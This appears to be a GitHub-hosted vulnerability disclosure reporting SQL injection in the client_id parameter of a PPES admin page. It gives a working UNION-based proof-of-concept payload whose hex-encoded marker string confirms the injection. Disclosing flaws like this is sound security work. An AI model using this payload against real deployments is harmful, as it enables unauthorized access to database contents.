Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

BUG_Author: LeoZhangCA

Vulnerability File: /PPES/admin/returned_reuse_form.php

GET parameter "client_id" exists SQL injection vulnerability

Payload1: client_id=-1' union all select null,null,null,null,concat(0x5152535556,0x666768),null,null,null-- -&dep_id=17&item_id=27

The UNION query is successful, and the expected string "QRSVfgh" appears, which proves that there is a SQL injection vulnerability

image